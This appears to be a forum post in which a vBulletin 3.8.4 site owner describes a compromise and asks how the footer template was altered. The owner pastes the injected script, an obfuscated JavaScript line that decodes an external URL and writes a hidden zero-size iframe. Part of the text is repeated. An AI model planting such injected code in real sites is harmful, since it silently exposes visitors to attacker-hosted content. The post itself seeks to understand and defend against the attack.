One of my sites was hacked last week and then again the other day.
I was running vB 3.8.4 at the time and I've managed to upgrade to vB 3.8.5 now, which I'm hoping has plugged the hole.
However, I thought it would be prudent to verify that this was a vulnerability in 3.8.4 and not a problem with something else on my site.
The hacker was able to insert some code into the footer template on my site to execute some JavaScript which added a hidden iframe directed to an external site.
Is this a known exploit in the base v3.8.4 vBulletin code?
How is it that the attacker was able to update the database to insert this code into the footer template?
If I can understand the attack vector, I stand a better chance of identifying any other weaknesses on my site.
I was running vB 3.8.4 at the time and I've managed to upgrade to vB 3.8.5 now, which I'm hoping has plugged the hole.
However, I thought it would be prudent to verify that this was a vulnerability in 3.8.4 and not a problem with something else on my site.
The hacker was able to insert some code into the footer template on my site to execute some JavaScript which added a hidden iframe directed to an external site.
HTML Code:
<script type="text/javascript"> <!-- // Main vBulletin Javascript Initialization vBulletin_init(); var x = unescape("%68%74%74%70%3a%2f%2f%6e%65%6f%6e%73%74%61%74%2e%68%6d%73%69%74%65%2e%6e%65%74%2f%73%74%61%74");document.write("<i"+"fr"+"am"+"e s"+"r"+"c=\""+x+"/ind"+"e"+"x.p"+"hp\" w"+"id"+"th=\"0\" he"+"i"+"ght=\"0\" fr"+"a"+"m"+"ebor"+"de"+"r=\"0\"><"+"/ifra"+"m"+"e>"); //--> </script>
How is it that the attacker was able to update the database to insert this code into the footer template?
If I can understand the attack vector, I stand a better chance of identifying any other weaknesses on my site.
Comment